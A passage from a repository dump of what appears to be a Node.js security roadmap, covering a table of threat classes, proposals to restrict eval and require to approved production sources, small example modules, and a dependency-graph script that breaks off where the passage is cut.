| 10 | Shell injection may also occur during development and deployment. For 11 | example, [npm][npm hooks] and [Bower][bower hooks] 12 | `{pre-,,post-}install` hooks may be subject to shell injection via 13 | filenames that contain shell meta-characters in malicious transitive 14 | dependencies but we classify this as an [MTP][] vulnerability.
15 | 16 | [MTP]: threat-MTP.md 17 | [npm hooks]: https://docs.npmjs.com/misc/scripts 18 | [bower hooks]: https://bower.io/docs/config/#hooks 19 | [Shell injection]: http://cwe.mitre.org/data/definitions/77.html 20 | [api/child_process]: https://nodejs.org/api/child_process.html 21 | -------------------------------------------------------------------------------- /chapter-1/threats.md: -------------------------------------------------------------------------------- 1 | # Threat environment 2 | 3 | The threat environment for Node.js is similar to that for other runtimes that 4 | are primarily used for microservices and web frontends, but there are some 5 | Node.js specific concerns. 6 | 7 | We define both kinds of threats in this section. A reader familiar with 8 | web-application security can skip all but this page and the discussion 9 | of [*unintended require*][UIR] without missing much, but may find it 10 | helpful to refer back to the table below when reading later chapters. 11 | 12 | ## Server vs Client-side JavaScript 13 | 14 | Before we discuss the threat environment, it's worth noting that the threat 15 | environment for server-side JavaScript is quite different from that for 16 | client-side JavaScript. For example, 17 | 18 | * Client-side JavaScript runs in the context of the 19 | [same-origin policy][] possibly with a 20 | [Content-Security-Policy][CSP] which governs which code can load. 21 | Server-side JavaScript **code loading** is typically only 22 | constrained by the files on the server, and the values that can 23 | reach `require(...)`, `eval(...)` and similar operators. 24 | * Client-side JavaScript typically only has access to data that the 25 | human using the browser should have access to. On the server, 26 | applications are responsible for **data [compartmentalization][]**, 27 | and server-side JavaScript often has privileged access to storage 28 | systems and other backends. 
29 | * **File-system access** by the client typically either requires human 30 | interaction 31 | (`<input type=file>`, `Content-disposition:attachment`), or can only access 32 | a directory dedicated to third-party content (browser cache, local storage) 33 | and which is not usually on a list like `$PATH`. 34 | On the server, the Node runtime process's privileges determine 35 | [file-system access][nodejs/fs]. 36 | * Client-side JavaScript has no concept of a **shell** that converts 37 | strings into commands that run outside the JavaScript engine. 38 | Server-side JavaScript can spawn 39 | [child processes][nodejs/child_process] that operate on data 40 | received over the network, and on data that is accessible to the 41 | Node runtime process. 42 | * **Network messages** sent by server-side JavaScript originate inside 43 | the server's LAN, but those sent by client-side JavaScript typically do not. 44 | * **Shared memory concurrency** in client-side JavaScript happens via 45 | well-understood APIs like `SharedArrayBuffer`. Experimental modules 46 | ([code][threads-a-gogo]) and a [workers proposal][] 47 | allow server-side JavaScript to fork threads; it is 48 | unclear how widespread these are in production or how 49 | [susceptible][thread corner cases] these are to memory corruption 50 | or exploitable race conditions. 51 | * Client-side, the browser halts all scripts in a document when a 52 | single event loop cycle **runs too long**. 53 | Node.js has few ways to manage runaway computations on the server. 54 | 55 | The threat environment for server-side JavaScript is much closer to 56 | that for any other server-side framework than to that for JavaScript in the 57 | browser. 58 | 59 | ## Classes of Threats {#threat_table} 60 | 61 | The table below lists broad classes of vulnerabilities, and for each, 62 | a short identifier by which we refer to the class later in this 63 | document.
This list is not meant to be comprehensive, but we expect 64 | that a thorough security assessment would touch on most of these and 65 | would have low confidence in an assessment that skips many. 66 | 67 | The frequency and severity of vulnerabilities are guesstimates since 68 | we have little hard data on the frequency of these in Node.js 69 | applications, so have extrapolated from similar systems. For example, 70 | see discussion about frequency in [buffer overflow][BOF]. 71 | 72 | For each, relevant mitigation strategies appear in the mitigations 73 | columns, and link to the discussion. 74 | 75 | | Shorthand | Description | Frequency | Severity | Mitigations | 76 | | --------- | ------------------------------------------------------------------------------------- | --------- | -------- | --------------------------- | 77 | | [0DY][] | Zero-day. Attackers exploit a vulnerability before a fix is available. | Low-Med | Med-High | [cdeps][m-cd] [fail][m-fa] | 78 | | [BOF][] | Buffer overflow. | Low | High | [ovrsi][m-os] | 79 | | [CRY][] | Misuse of crypto leads to poor access-control decisions or data leaks. | Medium | Medium | [ovrsi][m-os] | 80 | | [DEX][] | Poor developer experience slows or prevents release of features. | ? | ? | [dynam][m-dy] [ovrsi][m-os] | 81 | | [DOS][] | Denial of service | Medium | Low-Med | TBD | 82 | | [EXF][] | Exfiltration of data, e.g. by exploiting reflection to serialize more than intended. | Med-High | Low-Med | [ovrsi][m-os] | 83 | | [LQC][] | Using low quality dependencies leads to exploit | Medium | Low-Med | [kdeps][m-kd] [ovrsi][m-os] | 84 | | [MTP][] | Theft of commit rights or MITM causes `npm install` to fetch malicious code. | Low | Med-High | [kdeps][m-kd] [cdeps][m-cd] | 85 | | [QUI][] | Query injection on a production machine. | Medium | Med-High | [ovrsi][m-os] [qlang][m-ql] | 86 | | [RCE][] | Remote code execution, e.g. 
via `eval` | Med-High | High | [dynam][m-dy] [ovrsi][m-os] | 87 | | [SHP][] | Shell injection on a production machine. | Low | High | [ovrsi][m-os] [cproc][m-cp] | 88 | | [UIR][] | `require(untrustworthyInput)` loads code not intended for production. | Low | Low-High | [dynam][m-dy] | 89 | 90 | 91 | ## Meltdown and Spectre 92 | 93 | As of this writing, the security community is trying to digest 94 | the implications of *Meltdown* and *Spectre*. The 95 | [Node.js blog][Meltdown Spectre Impact] addresses them from a 96 | Node.js perspective, so we do not comment in depth. 97 | 98 | It is worth noting though that those vulnerabilities lead to 99 | breaches of *confidentiality*. While confidentiality violations 100 | are serious, the suggestions that follow use design principles 101 | that prevent a violation of confidentiality from causing a 102 | violation of *integrity*. Specifically: 103 | 104 | * Knowing a whitelist of production source hashes does not 105 | allow an attacker to cause a non-production source to load. 106 | * Our runtime `eval` mitigation relies on JavaScript reference 107 | equality, not knowledge of a secret. 
108 | 109 | 110 | [same-origin policy]: https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy 111 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/ 112 | [compartmentalization]: https://cwe.mitre.org/data/definitions/653.html 113 | [nodejs/fs]: https://nodejs.org/api/fs.html 114 | [nodejs/child_process]: https://nodejs.org/api/child_process.html 115 | [threads-a-gogo]: https://github.com/xk/node-threads-a-gogo/blob/74005641d53b0d85e8d75e2506eddbded15f5112/src/threads_a_gogo.cc#L1387 116 | [workers proposal]: https://github.com/nodejs/worker/issues/2 117 | [thread corner cases]: https://github.com/nodejs/worker/issues/4#issuecomment-306090967 118 | [Query Injection]: https://cwe.mitre.org/data/definitions/89.html 119 | [0DY]: threat-0DY.md 120 | [BOF]: threat-BOF.md 121 | [CRY]: threat-CRY.md 122 | [DEX]: threat-DEX.md 123 | [DOS]: threat-DOS.md 124 | [EXF]: threat-EXF.md 125 | [LQC]: threat-LQC.md 126 | [MTP]: threat-MTP.md 127 | [QUI]: threat-QUI.md 128 | [RCE]: threat-RCE.md 129 | [SHP]: threat-SHP.md 130 | [UIR]: threat-UIR.md 131 | [m-dy]: ../chapter-2/dynamism.md 132 | [m-kd]: ../chapter-3/knowing_dependencies.md 133 | [m-cd]: ../chapter-4/close_dependencies.md 134 | [m-os]: ../chapter-5/oversight.md 135 | [m-fa]: ../chapter-6/failing.md 136 | [m-cp]: ../chapter-7/child-processes.md 137 | [m-ql]: ../chapter-7/query-langs.md 138 | [Meltdown Spectre Impact]: https://nodejs.org/en/blog/vulnerability/jan-2018-spectre-meltdown/ 139 | -------------------------------------------------------------------------------- /chapter-2/bounded-eval.md: -------------------------------------------------------------------------------- 1 | # Dynamically bounding `eval` 2 | 3 | If we could provide an API that was available statically, but not dynamically 4 | we could double-check uses of `eval` operators. 
5 | 6 | ```js 7 | // API for allowing some eval 8 | var prettyPlease = require('prettyPlease'); 9 | // Carefully reviewed JavaScript generating code 10 | var codeGenerator = require('codeGenerator'); 11 | 12 | let compile; 13 | 14 | prettyPlease.mayI( 15 | module, 16 | (evalPermission) => { 17 | compile = function (source) { 18 | const js = codeGenerator.generateCode(source); 19 | return prettyPlease.letMeEval( 20 | evalPermission, 21 | js, 22 | () => ((0, eval)(js))); 23 | }; 24 | }); 25 | 26 | exports.compile = compile; 27 | ``` 28 | 29 | The `prettyPlease` module cannot be pure JavaScript since only the 30 | C++ linker can take advantage of *CodeGeneration* callbacks 31 | ([code][CodeGeneration callbacks]) the way CSP does 32 | ([code][CSP callback]) on the client, but the definition would be 33 | roughly: 34 | 35 | ```js 36 | // prettyPlease module 37 | (() => { 38 | const _PERMISSIVE_MODE = 0; // Default 39 | const _STRICT_MODE = 1; 40 | const _REPORT_ONLY_MODE = 2; 41 | 42 | const _MODE = /* From command line arguments */; 43 | const _WHITELIST = new Set(/* From command line arguments */); 44 | 45 | const _VALID_PERMISSIONS = new WeakSet(); 46 | const _EVALABLE_SOURCES = new Map(); 47 | 48 | if (_MODE !== _PERMISSIVE_MODE) { 49 | // Pseudocode: the code-generation callback installed when the 50 | // JavaScript engine is initialized. 51 | function codeGenerationCheckCallback(context, source) { 52 | // source must be a v8::Local or ChakraCore equivalent 53 | // so no risk of polymorphing 54 | if (_EVALABLE_SOURCES.has(source)) { 55 | return true; 56 | } 57 | console.warn(...); 58 | return _MODE == _REPORT_ONLY_MODE; 59 | } 60 | } 61 | 62 | // requestor -- the `module` value in the scope of the code requesting 63 | // permissions. 64 | // callback -- called with the generated permission whether granted or 65 | // not. 
This puts the permission in a parameter name making it 66 | // much less likely that an attacker who controls a key to obj[key] 67 | // can steal it. 68 | module.mayI = function (requestor, callback) { 69 | const id = String(requestor.id); 70 | const filename = String(requestor.filename); 71 | const permission = Object.create(null); // Token used for identity 72 | // TODO: Needs privileged access to real module cache so a module 73 | // can't masquerade as another by mutating the module cache. 74 | if (_MODE !== _PERMISSIVE_MODE 75 | && requestor === require.cache[filename] 76 | && _WHITELIST.has(id)) { 77 | _VALID_PERMISSIONS.add(permission); 78 | // Typical usage is to request permission once during module load. 79 | // Removing from whitelist prevents later bogus requests after 80 | // the module is exposed to untrusted inputs. 81 | _WHITELIST.delete(id); 82 | } 83 | return callback(permission); 84 | }; 85 | 86 | // permission -- a value received via mayI 87 | // sourceToEval -- code to eval. The code generation callback will 88 | // expect this exact string as its source. 89 | // codeThatEvals -- a callback that will be called in a scope that 90 | // allows eval of sourceToEval. 
91 | module.letMeEval = function (permission, sourceToEval, codeThatEvals) { 92 | sourceToEval = String(sourceToEval); 93 | if (_MODE === _PERMISSIVE_MODE) { 94 | return codeThatEvals(); 95 | } 96 | 97 | if (!_VALID_PERMISSIONS.has(permission)) { 98 | console.warn(...); 99 | if (_MODE !== _REPORT_ONLY_MODE) { 100 | return codeThatEvals(); 101 | } 102 | } 103 | 104 | const countBefore = _EVALABLE_SOURCES.get(sourceToEval) || 0; 105 | _EVALABLE_SOURCES.set(sourceToEval, countBefore + 1); 106 | try { 107 | return codeThatEvals(); 108 | } finally { 109 | if (countBefore) { 110 | _EVALABLE_SOURCES.set(sourceToEval, countBefore); 111 | } else { 112 | _EVALABLE_SOURCES.delete(sourceToEval); 113 | } 114 | } 115 | }; 116 | })(); 117 | ``` 118 | 119 | and the `eval` operators would check that their argument is in the global 120 | set. 121 | 122 | Implicit access to `eval` is possible because reflective operators can 123 | reach `eval`. As long as we can prevent reflective access to 124 | `evalPermission` we can constrain what can be `eval`ed. If 125 | `evalPermission` is a function parameter, then only `arguments` 126 | aliases it, so functions that do not mention the special name 127 | `arguments` may safely receive one. Most functions do not mention 128 | `arguments`. Before whitelisting a module, a reviewer would be wise 129 | to check for any use of `arguments`, and for any escape of permissions 130 | or `module`. 131 | 132 | `evalPermission` is an opaque token — only its reference identity 133 | is significant, so we can check membership in a `WeakSet` without 134 | risk of forgery. 135 | 136 | This requires API changes to existing modules that dynamically use 137 | `eval`, but the changes should be additive and straightforward. 138 | 139 | It also allows project teams and security specialists to decide on 140 | a case-by-case basis, which modules really need dynamic `eval`.
141 | 142 | As with synthetic modules, frozen realms may provide a way to further 143 | restrict what dynamically loaded code can do. If you're trying to 144 | decide whether to trust a module that dynamically loads code, you have 145 | more ways to justifiably conclude that it's safe if the module loads code 146 | into a sandbox that restricts that code to a limited frozen API. 147 | 148 | [CodeGeneration callbacks]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=626 149 | [CSP callback]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=352 150 | -------------------------------------------------------------------------------- /chapter-2/bundling.md: -------------------------------------------------------------------------------- 1 | # Dynamic Bundling 2 | 3 | Consider a simple Node application: 4 | 5 | ```js 6 | // index.js 7 | // Example that uses various require(...) use cases. 8 | 9 | let staticLoad = require('./lib/static'); 10 | function dynamicLoad(f, x) { 11 | return f('./lib/' + x); 12 | } 13 | dynamicLoad(require, Math.random() < 2 ?
'dynamic' : 'bogus'); 14 | exports.lazyLoad = () => require('./lib/lazy'); 15 | 16 | // Fallback to alternatives 17 | require(['./lib/opt1', './lib/opt2'].find( 18 | (name) => { 19 | try { 20 | require.resolve(name); 21 | return true; 22 | } catch (_) { 23 | return false; 24 | } 25 | })); 26 | ``` 27 | 28 | with some unit tests: 29 | 30 | ```js 31 | // test/test.js 32 | 33 | var expect = require("chai").expect; 34 | var app = require("../index"); 35 | 36 | describe("My TestSuite", () => { 37 | describe("A test", () => { 38 | it("A unittest", () => { 39 | // Exercise the API 40 | app.lazyLoad(); 41 | }); 42 | }); 43 | }); 44 | ``` 45 | 46 | We hack `updateChildren`, which gets called by `Module._load` for new 47 | modules and when a module requires a cached module, to dump information 48 | about loads: 49 | 50 | ```diff 51 | diff --git a/lib/module.js b/lib/module.js 52 | index cc8d5097bb..945ab8a4a8 100644 53 | --- a/lib/module.js 54 | +++ b/lib/module.js 55 | @@ -59,8 +59,18 @@ stat.cache = null; 56 | 57 | function updateChildren(parent, child, scan) { 58 | var children = parent && parent.children; 59 | - if (children && !(scan && children.includes(child))) 60 | + if (children && !(scan && children.includes(child))) { 61 | + if (parent.filename && child.id) { 62 | + // HACK: rather than require('fs') to write a file out, we 63 | + // log to the console. 64 | + // We assume the prefix will be removed and the result wrapped in 65 | + // a DOT digraph. 66 | + console.log( 67 | + 'REQUIRE_LOG_DOT: ' + JSON.stringify(parent.filename) 68 | + + ' -> ' + JSON.stringify(child.id) + ';'); 69 | + } 70 | children.push(child); 71 | + } 72 | } 73 | ``` 74 | 75 | Running the tests and extracting the graph ([code][extract-script]) 76 | gives us a rather [hairy dependency graph](example/graphs/full.svg): 77 | 78 | 79 | 80 | We add an edge from `"./package.json"` to the module's main file. 
81 | Then we filter edges ([code][graph-filter]) to include only those 82 | reachable from `"./package.json"`. This lets us distinguish files 83 | loaded by the test runner and tests from those loaded after control 84 | has entered an API in a production file. 85 | 86 | The resulting graph is much simpler: 87 | 88 | ![Production Source Files](example/graphs/filtered.svg) 89 | 90 | Note that the production file list includes dynamically and lazily 91 | loaded files. It does include `./lib/opt2.js` but not `./lib/opt1.js`. 92 | The latter file does not exist, so the loop which picks the first 93 | available alternative tries and finds the former. 94 | 95 | Our production source list should include all the files we need 96 | in production if 97 | 98 | * The unit tests `require` the main file 99 | * The unit tests have enough coverage to load all modules required 100 | in production via APIs defined in the main file or in APIs 101 | transitively loaded from there. 102 | 103 | It is definitely possible to miss some files. If the unit test did 104 | not call `app.lazyLoad` then there would be no edge to 105 | `./lib/lazy.js`. To address this, developers can 106 | 107 | * Expand test coverage to exercise code paths that load the 108 | missing source files. 109 | * Or add an explicit whitelist like 110 | ```js 111 | // production-source-whitelist.js 112 | require('./index.js'); 113 | require('./lib/lazy.js'); 114 | ``` 115 | and explicitly pass this as the main file to the filter 116 | instead of defaulting to the one specified in `package.json`. 117 | 118 | Dynamic analysis is not perfect, but a missing source file is 119 | readily apparent, so this replaces 120 | 121 | * hard-to-detect bugs with potentially severe security consequences, 122 | 123 | with 124 | 125 | * easy-to-detect bugs with negligible security consequences.
126 | 127 | [extract-script]: https://github.com/google/node-sec-roadmap/blob/master/chapter-2/example/make_dep_graph.sh 128 | [graph-filter]: https://github.com/google/node-sec-roadmap/blob/6130b76446ff4efbb276d8128c12e41ea2fffbc9/chapter-2/example/make_dep_graph.sh#L39-L73 129 | -------------------------------------------------------------------------------- /chapter-2/dynamism.md: -------------------------------------------------------------------------------- 1 | # Dynamism when you need it 2 | 3 | ## Background 4 | 5 | Node.js code is composed of CommonJS modules that are linked together 6 | by the builtin `require` function, or [`import`][import-js] statements 7 | (used by [TypeScript][import-ts]) that typically transpile to 8 | `require` (modulo [experimental features][esm]). 9 | 10 | `require` itself calls `Module._load` ([code][Module._load]) to 11 | resolve and load code. ["The Node.js Way"][FKS] explains this flow 12 | well. 13 | 14 | Unlike `import`, `require` is dynamic: a runtime value can specify the 15 | name of a module to load. (The EcmaScript committee is considering a 16 | [dynamic `import` operator][import-op-strawman], but we have 17 | not included that in this analysis.) 18 | 19 | 20 | This dynamism is powerful and flexible and enables varied use cases 21 | like the following: 22 | 23 | * Lazy loading. Waiting to load a dependency until it is definitely needed. 24 | ```js 25 | const infrequentlyUsedAPI = (function () { 26 | const dependency = require('dependency'); 27 | return function infrequentlyUsedAPI() { 28 | // Use dependency 29 | }; 30 | }()); 31 | ``` 32 | * Loading plugins based on a configuration object. 
33 | ```js 34 | function Service(config) { 35 | (config.plugins || []).forEach( 36 | (pluginName) => { 37 | require(pluginName).initPlugin(this); 38 | }); 39 | } 40 | ``` 41 | * Falling back to an alternate service provider if the first choice 42 | isn't available: 43 | ```js 44 | const KNOWN_SERVICE_PROVIDERS = ['foo-widget', 'bar-widget']; 45 | const serviceProviderName = KNOWN_SERVICE_PROVIDERS.find( 46 | (name) => { 47 | try { 48 | require.resolve(name); 49 | return true; 50 | } catch (_) { 51 | return false; 52 | } 53 | }); 54 | const serviceProvider = require(serviceProviderName); 55 | ``` 56 | * Taking advantage of an optional dependency when it is available. 57 | ```js 58 | let optionalDependency = null; 59 | try { 60 | optionalDependency = require('optionalDependency'); 61 | } catch (_) { 62 | // Oh well. 63 | } 64 | ``` 65 | * Loading a handler for a runtime value based on a naming convention. 66 | ```js 67 | function handle(request) { 68 | const handlerName = request.type + '-handler'; // Documented convention 69 | let handler; 70 | try { 71 | handler = require(handlerName); 72 | } catch (e) { 73 | throw new Error( 74 | 'Expected handler ' + handlerName 75 | + ' for requests with type ' + request.type); 76 | } 77 | return handler.handle(request); 78 | } 79 | ``` 80 | * Introspecting over module metadata. 81 | ```js 82 | const version = require('./package.json').version; 83 | ``` 84 | 85 | During rapid development, [file-system monitors][nodemon] can restart 86 | a node project when source files change, and the application stitches 87 | itself together without the complex compiler and build system 88 | integration that statically compiled languages use to do incremental 89 | recompilation. 90 | 91 | 92 | ## Problem 93 | 94 | Threats: [DEX][] [RCE][] [UIR][] 95 | 96 | The `node_modules` directory does not keep production code separate 97 | from test code. 
If test code can be `require`d in production, then 98 | an attacker may find it far easier to execute a wide variety of other 99 | attacks. See [UIR][] for more details on this. 100 | 101 | Node applications rely on dynamic uses of `require` and changes that 102 | break any of these use cases would require coordinating large scale 103 | changes to existing code, tools, and development practices threatening 104 | [developer experience][DEX]. 105 | 106 | Requiring developers to pick and choose which source files are 107 | production and which are test would either: 108 | 109 | * Require them to scrutinize source files not only for their project 110 | but also for deep dependencies with which they are unfamiliar 111 | leading to poor developer experience. 112 | * Whitelist without scrutiny leading to the original security problem. 113 | * Lead them to not use available modules to solve problems and instead 114 | roll their own leading to poor developer experience, and possibly 115 | [LQC][] problems. 116 | 117 | We need to ensure that only source code written with production 118 | constraints in mind loads in production without increasing the burden 119 | on developers. 120 | 121 | When the behavior of code in production is markedly different from that 122 | on a developer's workstation, developers lose confidence that they 123 | can avoid bugs in production by testing locally which may lead 124 | to poor developer experience and lower quality code. 125 | 126 | 127 | ## Success Criteria 128 | 129 | We would have prevented abuse of `require` if: 130 | 131 | * Untrusted inputs could not cause `require` to load a 132 | non-production source file, 133 | * and/or no non-production source files are reachable by 134 | `require`, 135 | * and/or loading a non-production source file has no adverse effect. 
136 | 137 | We would have successfully prevented abuse of `eval`, `new Function` 138 | and related operators if: 139 | 140 | * Untrusted inputs cannot reach an `eval` operator, 141 | * and/or untrusted inputs that reach them cause no adverse effects, 142 | * and/or security specialists could whitelist uses of `eval` operators 143 | that are necessary for the functioning of the larger 144 | system and compatible with the system's security goals. 145 | 146 | In both cases, converting dynamic operators to static before untrusted 147 | inputs reach the system reduces the attack surface. Requiring 148 | large-scale changes to existing npm modules or requiring large-scale 149 | rewrites of code that uses them compromises [DEX][]. 150 | 151 | 152 | ## Current practices 153 | 154 | Some development teams use [webpack][] or similar tools to statically 155 | bundle server-side modules, and provide flexible transpilation 156 | pipelines. That's a great way to do things, but solving security 157 | problems only for teams with development practices mature enough to 158 | deploy via webpack risks preaching to the choir. 159 | 160 | Webpack, in its minimal configuration, does not attempt to skip 161 | test files ([code][webpack-experiment]). 162 | Teams with an experienced webpack user can use it to great effect, but 163 | it is not an out-of-the-box solution. 164 | 165 | Webpacking does not prevent calls to `require(...)` with unintended 166 | arguments, but greatly reduces the chance that they will load 167 | non-production code. As long as the server process cannot read 168 | JS files other than those in the bundle, then a webpacked server 169 | is safe from [UIR][]. This may not be the case if the production 170 | machine has npm modules globally installed, and the server process 171 | is not running in a [chroot jail][].
172 | 173 | 174 | ## A Possible Solution 175 | 176 | We present one possible solution to demonstrate that tackling this 177 | problem is feasible. 178 | 179 | If we can compute the entire set of `require`-able sources when 180 | dealing only with inputs from trusted sources, then we can 181 | ensure that the node runtime only loads those sources even when 182 | exposed to untrusted inputs. 183 | 184 | We propose these changes: 185 | 186 | * A two phase approach to prevent abuse of `require`. 187 | 1. Tweaks to the node module loader that make it easy to 188 | [dynamically bundle](bundling.md) a release candidate. 189 | 2. Tweaks to the node module loader in production to restrict 190 | code loads based on [source content hashes](source-contents.md) 191 | from the bundling phase. 192 | * Two different strategies for preventing abuse of 193 | [`eval`](what-about-eval.md). 194 | * JavaScript idioms that can allow many uses of `eval` to 195 | [load as modules](synthetic-modules.md) and to bundle as above. 196 | * Using JavaScript engine callbacks to 197 | [allow uses of `eval`](bounded-eval.md) by approved modules. 
198 | 199 | [DEX]: ../chapter-1/threat-DEX.md 200 | [LQC]: ../chapter-1/threat-LQC.md 201 | [RCE]: ../chapter-1/threat-RCE.md 202 | [UIR]: ../chapter-1/threat-UIR.md 203 | [webpack]: https://webpack.js.org/ 204 | [Symbol]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol 205 | [import-js]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import 206 | [import-ts]: https://www.typescriptlang.org/docs/handbook/modules.html#import 207 | [Module._load]: https://github.com/nodejs/node/blob/0fdd88a374e23e1dd4a05d93afd5eb0c3b080fd5/lib/module.js#L449 208 | [FKS]: http://fredkschott.com/post/2014/06/require-and-the-module-system/ 209 | [esm]: https://nodejs.org/api/esm.html#esm_ecmascript_modules 210 | [nodemon]: https://nodemon.io/ 211 | [import-op-strawman]: https://github.com/tc39/proposal-dynamic-import 212 | [chroot jail]: https://help.ubuntu.com/community/BasicChroot 213 | [webpack-experiment]: https://github.com/google/node-sec-roadmap/tree/master/chapter-2/experiments/webpack-compat 214 | -------------------------------------------------------------------------------- /chapter-2/example/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | -------------------------------------------------------------------------------- /chapter-2/example/graphs/filtered.dot: -------------------------------------------------------------------------------- 1 | digraph Modules { 2 | "./package.json" [fillcolor=black,fontcolor=white,style=filled]; 3 | "./index.js" -> "./lib/static.js"; 4 | "./index.js" -> "./lib/dynamic.js"; 5 | "./index.js" -> "./lib/opt2.js"; 6 | "./index.js" -> "./lib/lazy.js"; 7 | "./package.json" -> "./index.js"; 8 | } 9 | -------------------------------------------------------------------------------- /chapter-2/example/graphs/filtered.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7
| 9 | 10 | Modules 11 | 12 | 13 | 14 | ./package.json 15 | 16 | ./package.json 17 | 18 | 19 | 20 | ./index.js 21 | 22 | ./index.js 23 | 24 | 25 | 26 | ./package.json->./index.js 27 | 28 | 29 | 30 | 31 | 32 | ./lib/static.js 33 | 34 | ./lib/static.js 35 | 36 | 37 | 38 | ./index.js->./lib/static.js 39 | 40 | 41 | 42 | 43 | 44 | ./lib/dynamic.js 45 | 46 | ./lib/dynamic.js 47 | 48 | 49 | 50 | ./index.js->./lib/dynamic.js 51 | 52 | 53 | 54 | 55 | 56 | ./lib/opt2.js 57 | 58 | ./lib/opt2.js 59 | 60 | 61 | 62 | ./index.js->./lib/opt2.js 63 | 64 | 65 | 66 | 67 | 68 | ./lib/lazy.js 69 | 70 | ./lib/lazy.js 71 | 72 | 73 | 74 | ./index.js->./lib/lazy.js 75 | 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /chapter-2/example/index.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // index.js 19 | // Example that tests various kinds of loads. 20 | 21 | let staticLoad = require('./lib/static'); 22 | function dynamicLoad(f, x) { 23 | return f('./lib/' + x); 24 | } 25 | dynamicLoad(require, Math.random() < 2 ? 
'dynamic' : 'bogus'); 26 | exports.lazyLoad = () => require('./lib/lazy'); 27 | 28 | // Fallback to alternatives 29 | require(['./lib/opt1', './lib/opt2'].find( 30 | (name) => { 31 | try { 32 | require.resolve(name); 33 | return true; 34 | } catch (_) { 35 | return false; 36 | } 37 | })); 38 | -------------------------------------------------------------------------------- /chapter-2/example/lib/dynamic.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // lib/dynamic.js 19 | 20 | exports.x = 'dynamic'; 21 | -------------------------------------------------------------------------------- /chapter-2/example/lib/lazy.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // lib/lazy.js 19 | 20 | exports.x = 'lazy'; 21 | -------------------------------------------------------------------------------- /chapter-2/example/lib/opt2.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // lib/opt2.js 19 | 20 | exports.x = 'opt2'; 21 | -------------------------------------------------------------------------------- /chapter-2/example/lib/static.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 
16 | */ 17 | 18 | // lib/static.js 19 | 20 | exports.x = 'static'; 21 | -------------------------------------------------------------------------------- /chapter-2/example/make_dep_graph.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | set -e 18 | 19 | cd "$(dirname "$0")" 20 | 21 | mkdir -p graphs 22 | ( 23 | echo 'digraph Modules {' 24 | 25 | # Run the tests and filter the logs for log entries from our 26 | # hacked Module._load. 27 | # Also relativize source file paths. 28 | NODE=/Users/msamuel/work/node/out/Release/node \ 29 | PATH="/Users/msamuel/work/node/out/Release/:$PATH" \ 30 | 